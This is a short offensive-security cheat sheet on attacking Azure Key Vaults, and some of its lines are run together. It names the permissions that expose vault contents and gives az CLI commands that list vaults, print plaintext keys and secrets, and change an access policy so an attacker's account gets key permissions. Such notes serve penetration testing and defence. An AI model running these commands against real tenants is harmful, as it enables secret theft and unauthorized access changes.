Attacking Key Vaults
Microsoft.KeyVault/vaults/read # read keys in a vault
Microsoft.KeyVault/vaults/secrets/read # read the plaintext passwords in a vault
Microsoft.KeyVault/vaults/accessPolicies/write # change access policies of vaultsPS /home/otter> az keyvault list# list keys
PS /home/otter> az keyvault key list --vault-name <vault_name>
# show plaintext keys
PS /home/otter> az keyvault key show --vault-name <vault_name> -n <key_name># list secrets
PS /home/otter> az keyvault secret list --vault-name <vault_name>
# show plaintext secrets
PS /home/otter> az keyvault secret show --vault-name <vault_name> -n <secret_name> --query value -o tsvPS /home/otter> az keyvault set-policy -n <vault_name> --key-permission get list --upn otter@minions.onmicrosoft.comLast updated